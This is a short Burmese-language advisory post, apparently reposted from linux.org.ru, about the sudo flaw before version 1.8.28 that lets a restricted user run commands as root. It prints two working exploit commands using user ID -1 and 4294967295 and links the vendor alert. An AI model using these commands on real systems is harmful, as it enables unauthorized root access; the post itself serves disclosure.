sudo တွင် အားနည်းချက်

/etc/sudoers က အခြားအသုံးပြုသူများမှ လုပ်ဆောင်ခွင့်ပြုပြီး root အတွက် တားမြစ်ထားပါက sudo တွင် bug သည် မည်သည့် executable file ကိုမဆို root အနေဖြင့် execute လုပ်ခွင့်ပြုပါသည်။

အမှားကို အသုံးချခြင်းသည် အလွန်ရိုးရှင်းပါသည်။

sudo -u#-1 id -u

သို့မဟုတ်

sudo -u#4294967295 id -u

1.8.28 မတိုင်မီ sudo ဗားရှင်းအားလုံးတွင် အမှားရှိနေပါသည်။

အသေးစိတ်:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

source: linux.org.ru

မှတ်ချက် Add